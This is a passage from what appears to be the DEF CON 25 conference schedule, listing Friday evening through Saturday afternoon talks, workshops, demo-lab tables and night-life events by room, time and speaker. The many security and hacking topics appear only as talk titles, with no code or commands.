WS - Octavius 7 - cont...(14:30-18:30) - Advanced Wireless Attacks Against Enterprise Networks - Gabriel Ryan

 

Friday - 17:00


Return to Index  -  Locations Legend
BHV - Pisa Room - Creating Human 2.0: Three Case Studies from the Edges of Brain Rewiring Science - David Bach
BHV - Pisa Room - (17:30-17:59) - Human-Human Interface - Charles Tritt
BillW - Office 4A on Promenade Level - Friends of Bill W -
CHV - Village Talks Outside Contest Area, Pool Level - Turbo Talks – Getting Started With CarHacking, k-Line Hacking - Jerry Gamblin
CPV - Florentine Ballroom 3 - WS: Supersingular Isogeny Diffie-Hellman - Deirdre Connolly
CPV - Florentine Ballroom 4 - cont...(16:30-17:30) - Cryptanalysis in the Time of Ransomware - Mark Mager
CPV - Florentine Ballroom 4 - (17:30-18:30) - Unfairplay (NOT RECORDED) - [anonymous panel]
DC - Track 1 - Cisco Catalyst Exploitation - Artem Kondratenko
DC - Track 2 - Panel: DEF CON Groups - Jeff Moss (Dark Tangent), Waz, Brent White (B1TKILL3R), Jayson E. Street, Grifter, Jun Li, S0ups, Major Malfunction
DC - Track 3 - MEATPISTOL, A Modular Malware Implant Framework - FuzzyNop (Josh Schwartz), ceyx (John Cramb)
DC - Track 4 - The Internet Already Knows I'm Pregnant - Cooper Quintin, Kashmir Hill
ICS - Octavius 6 - cont...(14:30-18:30) - Industrial Control System Security 101 and 201- SOLD OUT - Matthew E. Luallen, Nadav Erez
IOT - Main Contest Area - (17:40-18:30) - 101 hardware hacking workshop - Ken Munro @TheKenMunroShow
PHV - Milano VIII - Promenade Level - AWS Persistence and Lateral Movement Techniques - Peter Ewane
PHW - Neopolitan BR IV - Promenade Level - Jailing Programs with Linux Containers - Jay Beale
RCV - Palermo room, Promenade level - Using phonetic algorithms to increase your search space and detect misspellings. - Alex Kahan
RCV - Palermo room, Promenade level - (17:25-17:59) - Attack Surface Discovery with Intrigue - Jcran
SEV - Emperors BR II - cont...(16:55-17:25) - Beyond Phishing - Building and Sustaining a Corporate SE Program - Fahey Owens
SEV - Emperors BR II - (17:30-18:20) - SE vs Predator: Using Social Engineering in ways I never thought… - Chris Hadnagy
SKY - Verona/Tuin/Trevi - Promenade Level - Child Abuse Material, Current Issues Trends & Technologies - @h0tdish and @mickmoran
VMHV - Roman 1, Promenade Level - Panel: Securing the Election Office: A Local Response to a Global Threat - Erik Kamerling, Tim Blute, Noah Praetz
WV - Florentine BR I & II - Promenade Level - Failsafe: Yet Another SimplySafe Attack Vector - Nick 'r@ndom' Delewski
WS - Octavius 1 - cont...(14:30-18:30) - Penetration Testing in Hostile Environments: Client & Tester Security - Wesley McGrew, Brad Pierce
WS - Octavius 4 - cont...(14:30-18:30) - Windows - The Undiscovered country - Chuck Easttom
WS - Octavius 5 - cont...(14:30-18:30) - Subverting Privacy Exploitation Using HTTP - Eijah
WS - Octavius 6 - cont...(14:30-18:30) - Industrial Control System Security 101 and 201 - Matthew E. Luallen, Nadav Erez
WS - Octavius 7 - cont...(14:30-18:30) - Advanced Wireless Attacks Against Enterprise Networks - Gabriel Ryan

 

Friday - 18:00


Return to Index  -  Locations Legend
BHV - Pisa Room - tDCS workshop - Darren and Jen
CPV - Florentine Ballroom 4 - cont...(17:30-18:30) - Unfairplay (NOT RECORDED) - [anonymous panel]
ICS - Octavius 6 - cont...(14:30-18:30) - Industrial Control System Security 101 and 201- SOLD OUT - Matthew E. Luallen, Nadav Erez
IOT - Main Contest Area - cont...(17:40-18:30) - 101 hardware hacking workshop - Ken Munro @TheKenMunroShow
Night Life - Chillout Lounge, Roman 3, Promenade Level - "DCG" Mixer -
Night Life - Lobby Bar - DEFCON 25 Meetup for /r/Defcon -
PHV - Milano VIII - Promenade Level - Threat Intel for All: There's More to Your Data Than Meets the Eye - Cheryl Biswas
PHW - Neopolitan BR IV - Promenade Level - cont...(17:00-18:30) - Jailing Programs with Linux Containers - Jay Beale
RCV - Palermo room, Promenade level - Skip tracing for fun and profit - Rhett Greenhagen
SEV - Emperors BR II - cont...(17:30-18:20) - SE vs Predator: Using Social Engineering in ways I never thought… - Chris Hadnagy
SEV - Emperors BR II - (18:25-19:15) - Hackers gonna hack - But do they know why? - Helen Thackray
SKY - Verona/Tuin/Trevi - Promenade Level - Hacking the Law: A Call for Action Bug Bounties Legal Terms as a Case Study - Amit Elazari
WV - Florentine BR I & II - Promenade Level - Reverse Engineering DSSS Extended Cut - Michael Ossmann
WS - Octavius 1 - cont...(14:30-18:30) - Penetration Testing in Hostile Environments: Client & Tester Security - Wesley McGrew, Brad Pierce
WS - Octavius 4 - cont...(14:30-18:30) - Windows - The Undiscovered country - Chuck Easttom
WS - Octavius 5 - cont...(14:30-18:30) - Subverting Privacy Exploitation Using HTTP - Eijah
WS - Octavius 6 - cont...(14:30-18:30) - Industrial Control System Security 101 and 201 - Matthew E. Luallen, Nadav Erez
WS - Octavius 7 - cont...(14:30-18:30) - Advanced Wireless Attacks Against Enterprise Networks - Gabriel Ryan

 

Friday - 19:00


Return to Index  -  Locations Legend
Night Life - Chillout Lounge, Roman 3, Promenade Level - cont...(18:00-20:00) - "DCG" Mixer
PHW - Neopolitan BR IV - Promenade Level - Introducing Mallet: An Intercepting Proxy for Arbitrary Protocols - SensePost
SEV - Emperors BR II - cont...(18:25-19:15) - Hackers gonna hack - But do they know why? - Helen Thackray
SEV - Emperors BR II - (19:15-20:05) - Skills For A Red-Teamer - Brent White & Tim Roberts

 

Friday - 20:00


Return to Index  -  Locations Legend
DC - Capri Room - Hacking Democracy - Mr. Sean Kanuck
DC - Modena - Horror stories of a translator and how a tweet can start a war with less than 140 characters - El Kentaro
DC - Trevi Room - Panel - An Evening with the EFF - Kurt Opsahl, Nate Cardozo, Eva Galperin, Shabid Buttar, Kit Walsh
Night Life - Roman 1, Promenade Level - Hacker Karaoke -
Night Life - Track 2 - Hacker Jeopardy -
Night Life - Track 3 - (20:30-24:00) - DEF CON Movie Night -
Night Life - Track 4 - Whose Slide is it anyway? -
PHW - Neopolitan BR IV - Promenade Level - cont...(19:00-20:30) - Introducing Mallet: An Intercepting Proxy for Arbitrary Protocols - SensePost
SEV - Emperors BR II - cont...(19:15-20:05) - Skills For A Red-Teamer - Brent White & Tim Roberts
SEV - Emperors BR II - Heavy Diving for Credentials: Towards an Anonymous Phishing - Yaiza Rubio & Felix Brezo

 

Friday - 21:00


Return to Index  -  Locations Legend
DC - Capri Room - cont...(20:00-21:59) - Hacking Democracy - Mr. Sean Kanuck
DC - Modena - cont...(20:00-21:59) - Horror stories of a translator and how a tweet can start a war with less than 140 characters - El Kentaro
DC - Trevi Room - cont...(20:00-21:59) - Panel - An Evening with the EFF - Kurt Opsahl, Nate Cardozo, Eva Galperin, Shabid Buttar, Kit Walsh
Night Life - Roman 1, Promenade Level - cont...(20:00-26:00) - Hacker Karaoke
Night Life - Track 1 & Chillout lounges - Official Entertainment: Richard Cheese -
Night Life - Track 2 - cont...(20:00-24:00) - Hacker Jeopardy
Night Life - Track 3 - cont...(20:30-24:00) - DEF CON Movie Night
Night Life - Track 4 - cont...(20:00-24:00) - Whose Slide is it anyway?
SEV - Emperors BR II - cont...(20:10-20:40) - Heavy Diving for Credentials: Towards an Anonymous Phishing - Yaiza Rubio & Felix Brezo

 

Friday - 22:00


Return to Index  -  Locations Legend
Night Life - Modena, Promenade level - Silent Disco : Party like a Hacker -
Night Life - Promenade level, in Skytalks room. - (22:30-27:00) - 303 Party - 303
Night Life - Roman 1, Promenade Level - cont...(20:00-26:00) - Hacker Karaoke
Night Life - Track 1 & Chillout lounges - cont...(21:00-22:30) - Official Entertainment: -
Night Life - Track 1 & Chillout lounges - (22:30-23:00) - Official Entertainment: DUALCORE -
Night Life - Track 3 - cont...(20:30-24:00) - DEF CON Movie Night
Night Life - Track 4 - cont...(20:00-24:00) - Whose Slide is it anyway?
Night Life - Turin, Promenade Level - INFOSEC UNLOCKED - INFOSEC UNLOCKED

 

Friday - 23:00


Return to Index  -  Locations Legend
IOT - Main Contest Area - (23:30-24:20) - IoT Village Keynote - Friends, Not Foes: Rethinking the Researcher-Vendor Relationship - Rick Ramgattie @RRamgattie
Night Life - Modena, Promenade level - cont...(22:00-27:00) - Silent Disco : Party like a Hacker
Night Life - Promenade level, in Skytalks room. - cont...(22:30-27:00) - 303 Party
Night Life - Roman 1, Promenade Level - cont...(20:00-26:00) - Hacker Karaoke
Night Life - Track 1 & Chillout lounges - Official Entertainment: MC FRONTALOT -
Night Life - Track 1 & Chillout lounges - (23:30-24:00) - Official Entertainment: YT CRACKER -
Night Life - Track 3 - cont...(20:30-24:00) - DEF CON Movie Night
Night Life - Track 4 - cont...(20:00-24:00) - Whose Slide is it anyway?
Night Life - Turin, Promenade Level - cont...(22:00-27:00) - INFOSEC UNLOCKED

 

Friday - 24:00


Return to Index  -  Locations Legend
IOT - Main Contest Area - cont...(23:30-24:20) - IoT Village Keynote - Friends, Not Foes: Rethinking the Researcher-Vendor Relationship - Rick Ramgattie @RRamgattie
Night Life - Modena, Promenade level - cont...(22:00-27:00) - Silent Disco : Party like a Hacker
Night Life - Promenade level, in Skytalks room. - cont...(22:30-27:00) - 303 Party
Night Life - Roman 1, Promenade Level - cont...(20:00-26:00) - Hacker Karaoke
Night Life - Track 1 & Chillout lounges - Official Entertainment: REEL BIG FISH -
Night Life - Turin, Promenade Level - cont...(22:00-27:00) - INFOSEC UNLOCKED

 

Friday - 25:00


Return to Index  -  Locations Legend
Night Life - Modena, Promenade level - cont...(22:00-27:00) - Silent Disco : Party like a Hacker
Night Life - Promenade level, in Skytalks room. - cont...(22:30-27:00) - 303 Party
Night Life - Roman 1, Promenade Level - cont...(20:00-26:00) - Hacker Karaoke
Night Life - Track 1 & Chillout lounges - cont...(24:00-25:30) - Official Entertainment:
Night Life - Track 1 & Chillout lounges - (25:30-26:00) - Official Entertainment: KRISZ KLINK -
Night Life - Turin, Promenade Level - cont...(22:00-27:00) - INFOSEC UNLOCKED

 

Friday - 26:00


Return to Index  -  Locations Legend
Night Life - Modena, Promenade level - cont...(22:00-27:00) - Silent Disco : Party like a Hacker
Night Life - Promenade level, in Skytalks room. - cont...(22:30-27:00) - 303 Party
Night Life - Turin, Promenade Level - cont...(22:00-27:00) - INFOSEC UNLOCKED

 

Saturday


This Schedule is tentative and may be changed at any time. Check at an Info Booth for the latest.

 

Saturday - 10:00


Return to Index  -  Locations Legend
BHV - Pisa Room - Total Recall: Implanting Passwords in Cognitive Memory - Tess Schrodinger
BHV - Pisa Room - (10:30-10:59) - Hacking the Second Genetic Code using Information Theory - Travis Lawrence
CPV - Florentine Ballroom 4 - (10:30-11:30) - The Surveillance Capitalism Will Continue Until Morale Improves - J0N J4RV1S
DC - Track 1 - Persisting with Microsoft Office: Abusing Extensibility Options - William Knowles
DC - Track 1 - (10:20-10:40) - Breaking Wind: Adventures in Hacking Wind Farm Control Networks - Jason Staggs
DC - Track 2 - $BIGNUM steps forward, $TRUMPNUM steps back: how can we tell if we're winning? - Cory Doctorow
DC - Track 3 - Get-$pwnd: Attacking Battle-Hardened Windows Server - Lee Holmes
DC - Track 3 - (10:20-10:40) - WSUSpendu: How to hang WSUS clients - Romain Coltel, Yves Le Provost
DC - Track 4 - The spear to break the security wall of S7CommPlus - Cheng, Zhang Yunhai
DC - Track 4 - (10:20-10:40) - (Un)Fucking Forensics: Active/Passive (i.e. Offensive/Defensive) memory hacking/debugging. - K2
DL - Table 1 - Fuzzapi - Abhijeth Dugginapeddi, Lalith Rallabhandi, Srinivas Rao
DL - Table 2 - GibberSense - Ajit Hatti
DL - Table 3 - Android Tamer - Anant Shrivastava
DL - Table 4 - WiFi Cactus - darkmatter
DL - Table 5 - Maltego "Have I been pwned?" - Christian Heinrich
DL - Table 6 - PIV OPACITY - Christopher Williams
ICS - Calibria - (10:30-10:59) - Dissecting industrial wireless implementations. - Blake Johnson
IOT - Main Contest Area - From DVR worms, to fridges, via dildos, the sins of the IoT in 50 minutes - Andrew Tierney @cybergibbons & Ken Munro @TheKenMunroShow
PHV - Milano VIII - Promenade Level - Make Your Own 802.11ac Monitoring Hacker Gadget - Vivek Ramachandran, Thomas d'Otreppe
PHW - Neopolitan BR IV - Promenade Level - The Kali Linux Dojo - Angela Could Have Done Better - Mati Aharoni
RCV - Palermo room, Promenade level - Burner Phone Challenge - Dakota Nelson
SKY - Verona/Tuin/Trevi - Promenade Level - Lessons From An Incident Responder AKA, Stories Of When Shit Goes Sideways - John Ives
WS - Octavius 1 - (10:30-14:30) - Practical BLE Exploitation for Internet of Things - Aditya Gupta, Dinesh Shetty
WS - Octavius 4 - (10:30-14:30) - UAC 0day, all day! - Ruben Boonen
WS - Octavius 5 - (10:30-14:30) - Edge cases in web hacking - John Poulin
WS - Octavius 6 - (10:30-14:30) - Free and Easy DFIR Triage for Everyone: From Collection to Analysis - Alan Orlikoski, Dan M.
WS - Octavius 7 - (10:30-14:30) - Practical Malware Analysis: Hands-On - Sam Bowne, Devin Duffy-Halseth, Dylan James Smith

 

Saturday - 11:00


Return to Index  -  Locations Legend
BHV - Pisa Room - Biohackers Die - Jeffrey Tibbetts
BHV - Pisa Room - (11:30-11:59) - Microscopes are Stupid - Louis Auguste
CHV - Village Talks Outside Contest Area, Pool Level - GPS System Integrity - Vlad Gostomelsky
CPV - Florentine Ballroom 3 - WS: Implementing An Elliptic Curve in Go - George Tankersley
CPV - Florentine Ballroom 4 - cont...(10:30-11:30) - The Surveillance Capitalism Will Continue Until Morale Improves - J0N J4RV1S
CPV - Florentine Ballroom 4 - (11:30-12:00) - Privacy is Not An Add-On: Designing for Privacy from the Ground Up - Alisha Kloc
DC - Track 1 - Microservices and FaaS for Offensive Security - Ryan Baxendale
DC - Track 1 - (11:20-11:40) - Abusing Webhooks for Command and Control - Dimitry Snezhkov
DC - Track 2 - Secure Tokin' and Doobiekeys: How to roll your own counterfeit hardware security devices - Joe FitzPatrick , Michael Leibowitz
DC - Track 3 - If You Give a Mouse a Microchip... It will execute a payload and cheat at your high-stakes video game tournament - skud (Mark Williams), Sky (Rob Stanley)
DC - Track 4 - Evading next-gen AV using artificial intelligence - Hyrum Anderson
DC - Track 4 - (11:20-12:35) - All Your Things Are Belong To Us - Zenofex, 0x00string, CJ_000, Maximus64
DL - Table 1 - cont...(10:00-11:50) - Fuzzapi - Abhijeth Dugginapeddi, Lalith Rallabhandi, Srinivas Rao
DL - Table 2 - cont...(10:00-11:50) - GibberSense - Ajit Hatti
DL - Table 3 - cont...(10:00-11:50) - Android Tamer - Anant Shrivastava
DL - Table 4 - cont...(10:00-11:50) - WiFi Cactus - darkmatter
DL - Table 5 - cont...(10:00-11:50) - Maltego "Have I been pwned?" - Christian Heinrich
DL - Table 6 - cont...(10:00-11:50) - PIV OPACITY - Christopher Williams
HHV - Main Contest Area, Pool Level - Workshop: Component Desoldering and Recovery -
HHV - Village Talks Outside Contest Area, Pool Level - cont...(11:00-12:00) - Ardusploit - Proof of concept for Arduino code injection - Cesare Pizzi
ICS - ICS-Village - (11:30-11:59) - Using Alexa for your Control System environment - Tom Van Norman
PHV - Milano VIII - Promenade Level - The Black Art of Wireless Post-Exploitation: Bypassing Port-Based Access Controls Using Indirect Wireless Pivots - Gabriel Ryan
PHW - Neopolitan BR IV - Promenade Level - cont...(10:00-11:59) - The Kali Linux Dojo - Angela Could Have Done Better - Mati Aharoni
RCV - Palermo room, Promenade level - cont...(10:00-11:59) - Burner Phone Challenge - Dakota Nelson
SKY - Verona/Tuin/Trevi - Promenade Level - Catch me leaking your data... if you can... - Mike Raggo & Chet Hosmer
WV - Florentine BR I & II - Promenade Level - (11:30-12:55) - SIGINT for the Rest of US - Matt Blaze
WS - Octavius 1 - cont...(10:30-14:30) - Practical BLE Exploitation for Internet of Things - Aditya Gupta, Dinesh Shetty
WS - Octavius 4 - cont...(10:30-14:30) - UAC 0day, all day! - Ruben Boonen
WS - Octavius 5 - cont...(10:30-14:30) - Edge cases in web hacking - John Poulin
WS - Octavius 6 - cont...(10:30-14:30) - Free and Easy DFIR Triage for Everyone: From Collection to Analysis - Alan Orlikoski, Dan M.
WS - Octavius 7 - cont...(10:30-14:30) - Practical Malware Analysis: Hands-On - Sam Bowne, Devin Duffy-Halseth, Dylan James Smith

 

Saturday - 12:00


Return to Index  -  Locations Legend
BillW - Office 4A on Promenade Level - Friends of Bill W -
CHV - Village Talks Outside Contest Area, Pool Level - That’s no car. It’s a network! - Mitch Johnson
CPV - Florentine Ballroom 3 - cont...(11:00-12:30) - WS: Implementing An Elliptic Curve in Go - George Tankersley
CPV - Florentine Ballroom 3 - (12:30-13:30) - WS: Secrets Management in the Cloud - Evan Johnson
CPV - Florentine Ballroom 4 - Operational Security Lessons from the Dark Web - Shea Nangle
DC - Track 1 - Driving down the rabbit hole - Mickey Shkatov, Jesse Michael, Oleksandr Bazhaniuk
DC - Track 2 - When Privacy Goes Poof! Why It's Gone and Never Coming Back - Richard Thieme a.k.a. neuralcowboy
DC - Track 3 - DNS - Devious Name Services - Destroying Privacy & Anonymity Without Your Consent - Jim Nitterauer
DC - Track 4 - cont...(11:20-12:35) - All Your Things Are Belong To Us - Zenofex, 0x00string, CJ_000, Maximus64
DL - Table 1 - LAMMA 1.0 - Antriksh Shah, Ajit Hatti
DL - Table 2 - https://crack.sh/ - David Hulton, Ian Foster
DL - Table 3 - GreatFET - Dominic Spill, Michael Ossmann
DL - Table 4 - Ruler - Pivoting Through Exchange - Etienne Stalmans
DL - Table 5 - SamyKam - Salvador Mendoza
DL - Table 6 - Splunking Dark Tools - A Pentesters Guide to Pwnage Visualization - Bryce Kunz @TweekFawkes, Nathan Bates (@Brutes_)
HHV - Village Talks Outside Contest Area, Pool Level - cont...(12:00-13:00) - What is Ground? (Baby don't hurt me) - Gigs Taggart
PHV - Milano VIII - Promenade Level - Fortune 100 InfoSec on a State Government Budget - Eric Capuano
PHW - Neopolitan BR IV - Promenade Level - (12:30-13:59) - Jailing Programs with Linux Containers - Jay Beale
RCV - Palermo room, Promenade level - Domain Discovery: Expanding your scope like a boss - Jason Haddix
SKY - Verona/Tuin/Trevi - Promenade Level - Crossing the Border with a Burner Phone: A Lawyer Explains Legal & Security Issues at the Border - wendy
WV - Florentine BR I & II - Promenade Level - cont...(11:30-12:55) - SIGINT for the Rest of US - Matt Blaze
WS - Octavius 1 - cont...(10:30-14:30) - Practical BLE Exploitation for Internet of Things - Aditya Gupta, Dinesh Shetty
WS - Octavius 4 - cont...(10:30-14:30) - UAC 0day, all day! - Ruben Boonen
WS - Octavius 5 - cont...(10:30-14:30) - Edge cases in web hacking - John Poulin
WS - Octavius 6 - cont...(10:30-14:30) - Free and Easy DFIR Triage for Everyone: From Collection to Analysis - Alan Orlikoski, Dan M.
WS - Octavius 7 - cont...(10:30-14:30) - Practical Malware Analysis: Hands-On - Sam Bowne, Devin Duffy-Halseth, Dylan James Smith

 

Saturday - 13:00


Return to Index  -  Locations Legend
BHV - Pisa Room - DIYBioweapons and Regulation - Meow Ludo Meow Meow
BHV - Pisa Room - (13:30-13:59) - IoT of Dongs - RenderMan
CHV - Village Talks Outside Contest Area, Pool Level - Insecure By Law - Corey Theun
CPV - Florentine Ballroom 3 - cont...(12:30-13:30) - WS: Secrets Management in the Cloud - Evan Johnson
CPV - Florentine Ballroom 4 - The Symantec/Chrome SSL debacle - how to do this better... - Jake Williams
DC - Track 1 - Demystifying Windows Kernel Exploitation by Abusing GDI Objects. - 5A1F (Saif El-Sherei)
DC - Track 2 - Koadic C3 - Windows COM Command & Control Framework - Sean Dillon (zerosum0x0), Zach Harding (Aleph-Naught-)
DC - Track 3 - Twenty Years of MMORPG Hacking: Better Graphics, Same Exploits - Manfred (@_EBFE)
DC - Track 4 - A Picture is Worth a Thousand Words, Literally: Deep Neural Networks for Social Stego - Philip Tully, Michael T. Raggo
DL - Table 1 - cont...(12:00-13:50) - LAMMA 1.0 - Antriksh Shah, Ajit Hatti
DL - Table 2 - cont...(12:00-13:50) - https://crack.sh/ - David Hulton, Ian Foster
DL - Table 3 - cont...(12:00-13:50) - GreatFET - Dominic Spill, Michael Ossmann
DL - Table 4 - cont...(12:00-13:50) - Ruler - Pivoting Through Exchange - Etienne Stalmans
DL - Table 5 - cont...(12:00-13:50) - SamyKam - Salvador Mendoza
DL - Table 6 - cont...(12:00-13:50) - Splunking Dark Tools - A Pentesters Guide to Pwnage Visualization - Bryce Kunz @TweekFawkes, Nathan Bates (@Brutes_)
HHV - Village Talks Outside Contest Area, Pool Level - cont...(13:00-14:00) - Hardware Hacking: Old Sk00l and New Sk00l - hwbxr
IOT - Main Contest Area - The Internet of Vulnerabilities - Deral Heiland @percent_x
PHV - Milano VIII - Promenade Level - YALDA – Large Scale Data Mining for Threat Intelligence - Gita Ziabari
PHW - Neopolitan BR IV - Promenade Level - cont...(12:30-13:59) - Jailing Programs with Linux Containers - Jay Beale
RCV - Palermo room, Promenade level - Recon and bug bounties what a great love story - Abhijeth
RCV - Palermo room, Promenade level - (13:25-13:59) - Using DFIR Orchestration and Automation Tools and Playbooks For OSINT and Recon - Tyler
SKY - Verona/Tuin/Trevi - Promenade Level - Trauma in Healthcare IT: My Differential Diagnosis and Call to Action - Audie
WV - Florentine BR I & II - Promenade Level - POCSAG Amateur Pager Network - Andrew 'r0d3nt' Strutt
WV - Florentine BR I & II - Promenade Level - (13:30-13:55) - Suitcase Repeater Build for UHF - 70cm - Andrew 'r0d3nt' Strutt
WS - Octavius 1 - cont...(10:30-14:30) - Practical BLE Exploitation for Internet of Things - Aditya Gupta, Dinesh Shetty
WS - Octavius 4 - cont...(10:30-14:30) - UAC 0day, all day! - Ruben Boonen
WS - Octavius 5 - cont...(10:30-14:30) - Edge cases in web hacking - John Poulin
WS - Octavius 6 - cont...(10:30-14:30) - Free and Easy DFIR Triage for Everyone: From Collection to Analysis - Alan Orlikoski, Dan M.
WS - Octavius 7 - cont...(10:30-14:30) - Practical Malware Analysis: Hands-On - Sam Bowne, Devin Duffy-Halseth, Dylan James Smith

 

Saturday - 14:00


Return to Index  -  Locations Legend
BHV - Pisa Room - Dangerous Minds Podcast: Live at DCBHV celebrating 100th episode - Awesome Folks from Various BioHacking Podcasts
CPV - Florentine Ballroom 3 - WS: SECURE COMMUNICATIONS IN ANDROID WITH TLS/SSL - Miguel Guirao
CPV - Florentine Ballroom 4 - Have you seen my naked selfies? Neither has my snoopy boyfriend. Privacy within a Relationship - Lauren Rucker
DC - Track 1 - Attacking Autonomic Networks - Omar Eissa
DC - Track 2 - Trojan-tolerant Hardware & Supply Chain Security in Practice - Vasilios Mavroudis, Dan Cvrcek
DC - Track 3 - Linux-Stack Based V2X Framework: All You Need to Hack Connected Vehicles - p3n3troot0r (Duncan Woodbury) , ginsback (Nicholas Haltmeyer)
DC - Track 4 - XenoScan: Scanning Memory Like a Boss - Nick Cano
DL - Table 1 - Mycroft - Joshua Montgomery
DL - Table 2 - bullDozer - Keith Lee
DL - Table 3 - CrackMapExec - Marcello Salvati
DL - Table 4 - Crypt-Keeper - Maurice Carey
DL - Table 5 - Bropy - Matt Domko
DL - Table 6 - Radare2 - Maxime Morin
ICS - Calibria - The gap in ICS Cyber security - Cyber security of Level 1 Field devices. - Joe Weiss
ICS - ICS-Village - (14:30-15:59) - ICS SCADA Forensics workshop/challenge - Joe Stirlandand Kevin Jones
IOT - Main Contest Area - (14:40-15:30) - IIDS: An Intrusion Detection System for IoT - Vivek Ramachandran @securitytube, Nishant Sharma, and Ashish Bhangale
PHV - Milano VIII - Promenade Level - Past, Present and Future of High Speed Packet Filtering on Linux - Gilberto Bertin
PHV - Milano VIII - Promenade Level - (14:40-14:59) - Visual Network and File Forensics - Ankur Tyagi
PHW - Neopolitan BR IV - Promenade Level - (14:30-15:59) - Introduction to 802.11 Packet Dissection - Megumi Takeshita
RCV - Palermo room, Promenade level - Total Recoll: Conducting Investigations without Missing a Thing - Dakota Nelson
RCV - Palermo room, Promenade level - (14:50-15:15) - How to obtain 100 Facebooks accounts per day through internet searches - Guillermo Buendia
SKY - Verona/Tuin/Trevi - Promenade Level - FERPA - Only Your Grades Are Safe; OSINT in Higher Education - Leah Figueroa/ Princess Leah
WS - Octavius 1 - cont...(10:30-14:30) - Practical BLE Exploitation for Internet of Things - Aditya Gupta, Dinesh Shetty
WS - Octavius 1 - (14:30-18:30) - Hacking Network Protocols using Kali - Thomas Wilhelm, John Spearing
WS - Octavius 4 - cont...(10:30-14:30) - UAC 0day, all day! - Ruben Boonen
WS - Octavius 4 - (14:30-18:30) - Principals on Leveraging PowerShell for Red Teams - Carlos Perez
WS - Octavius 5 - cont...(10:30-14:30) - Edge cases in web hacking - John Poulin
WS - Octavius 5 - (14:30-18:30) - Exploitation/Malware Forward Engineering - Sean Dillon, Zachary Harding
WS - Octavius 6 - cont...(10:30-14:30) - Free and Easy DFIR Triage for Everyone: From Collection to Analysis - Alan Orlikoski, Dan M.
WS - Octavius 6 - (14:30-18:30) - Pwning machine learning systems - Clarence Chio, Anto Joseph
WS - Octavius 7 - cont...(10:30-14:30) - Practical Malware Analysis: Hands-On - Sam Bowne, Devin Duffy-Halseth, Dylan James Smith
WS - Octavius 7 - (14:30-18:30) - Harnessing the Power of Docker and Kubernetes to Supercharge Your Hacking Tactics - Anshuman Bhartiya, Anthony Bislew

 

Saturday - 15:00


Return to Index  -  Locations Legend
BHV - Pisa Room - Biotechnology Needs a Security Patch...Badly - Ed You
BHV - Pisa Room - (15:30-15:59) - Standardizing the Secure Deployment of Medical Devices - Chris Frenz
CHV - Village Talks Outside Contest Area, Pool Level - Linux-Stack Based V2X Framework: All You Need to Hack Connected Vehicles - p3n3troot0r
CPV - Florentine Ballroom 3 - cont...(14:00-16:00) - WS: SECURE COMMUNICATIONS IN ANDROID WITH TLS/SSL - Miguel Guirao
CPV - Florentine Ballroom 4 - Yet another password hashing talk - Evgeny Sidorov
CPV - Florentine Ballroom 4 - (15:30-16:00) - Core Illumination: Traffic Analysis in Cyberspace - Kenneth Geers
DC - Capri Room - DC to DEF CON: Q&A with Congressmen James Langevin and Will Hurd - Representative James Langevin , Representative Will Hurd
DC - Track 1 - MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt) - Chris Thompson
DC - Track 2 - Tracking Spies in the Skies - Jason Hernandez, Sam Richards, Jerod MacDonald-Evoy
DC - Track 3 - DOOMed Point of Sale Systems - trixr4skids
DC - Track 4 - Digital Vengeance: Exploiting the Most Notorious C&C Toolkits - Professor Plum
DL - Table 1 - cont...(14:00-15:50) - Mycroft - Joshua Montgomery
DL - Table 2 - cont...(14:00-15:50) - bullDozer - Keith Lee
DL - Table 3 - cont...(14:00-15:50) - CrackMapExec - Marcello Salvati
DL - Table 4 - cont...(14:00-15:50) - Crypt-Keeper - Maurice Carey
DL - Table 5 - cont...(14:00-15:50) - Bropy - Matt Domko
DL - Table 6 - cont...(14:00-15:50) - Radare2 - Maxime Morin
HHV - Village Talks Outside Contest Area, Pool Level - cont...(15:00-16:00) - A Tangle of Plastic Spaghetti: A Look Into the Security of 3D Printers - John Dunlap
ICS - ICS-Village - cont...(14:30-15:59) - ICS SCADA Forensics workshop/challenge - Joe Stirlandand Kevin Jones
IOT - Main Contest Area - cont...(14:40-15:30) - IIDS: An Intrusion Detection System for IoT - Vivek Ramachandran @securitytube, Nishant Sharma, and Ashish Bhangale
PHV - Milano VIII - Promenade Level - Modern Day CovertTCP with a Twist - Mike Raggo, Chet Hosmer
PHW - Neopolitan BR IV - Promenade Level - cont...(14:30-15:59) - Introduction to 802.11 Packet Dissection - Megumi Takeshita
RCV - Palermo room, Promenade level - cont...(14:50-15:15) - How to obtain 100 Facebooks accounts per day through internet searches - Guillermo Buendia
RCV - Palermo room, Promenade level - (15:15-15:59) - OSINT Tactics on Source Code & Developers - Simon Roses
WV - Florentine BR I & II - Promenade Level - Large Scale Wireless Monitoring - KISMET packet sniffer on a multi-radio array - Alexander Zakharov
WS - Octavius 1 - cont...(14:30-18:30) - Hacking Network Protocols using Kali - Thomas Wilhelm, John Spearing
WS - Octavius 4 - cont...(14:30-18:30) - Principals on Leveraging PowerShell for Red Teams - Carlos Perez
WS - Octavius 5 - cont...(14:30-18:30) - Exploitation/Malware Forward Engineering - Sean Dillon, Zachary Harding
WS - Octavius 6 - cont...(14:30-18:30) - Pwning machine learning systems - Clarence Chio, Anto Joseph
WS - Octavius 7 - cont...(14:30-18:30) - Harnessing the Power of Docker and Kubernetes to Supercharge Your Hacking Tactics - Anshuman Bhartiya, Anthony Bislew

 

Saturday - 16:00


Return to Index  -  Locations Legend
BHV - Pisa Room - Reversing Your Own Source Code - Cosmo Mielke
CHV - Village Talks Outside Contest Area, Pool Level - (16:30-17:30) - The Bicho: An Advanced Car Backdoor Maker - Sheila Ayelen Berta
CPV - Florentine Ballroom 4 - rustls: modern, fast, safer TLS - Joseph Birr-Pixton
DC - Capri Room - cont...(15:00-16:59) - DC to DEF CON: Q&A with Congressmen James Langevin and Will Hurd - Representative James Langevin , Representative Will Hurd
DC - Track 1 - Dealing the perfect hand - Shuffling memory blocks on z/OS - Ayoul3
DC - Track 2 - From "One Country - One Floppy" to "Startup Nation" - the story of the early days of the Israeli hacking community, and the journey towards today's vibrant startup scene - Inbar Raz, Eden Shochat
DC - Track 3 - CableTap: Wirelessly Tapping Your Home Network - Marc Newlin, Logan Lamb, Chris Grayson
DC - Track 4 - Game of Drones: Putting the Emerging "Drone Defense" Market to the Test - Francis Brown, David Latimer
DL - Table 1 - Advanced Spectrum Monitoring with ShinySDR - Michael Ossmann, Dominic Spill
DL - Table 2 - DNS-Exfil-Suite - Nolan Berry, Cory Schwartz
DL - Table 3 - CellAnalysis - Pedro Cabrera
DL - Table 4 - Universal Serial aBUSe - Rogan Dawes
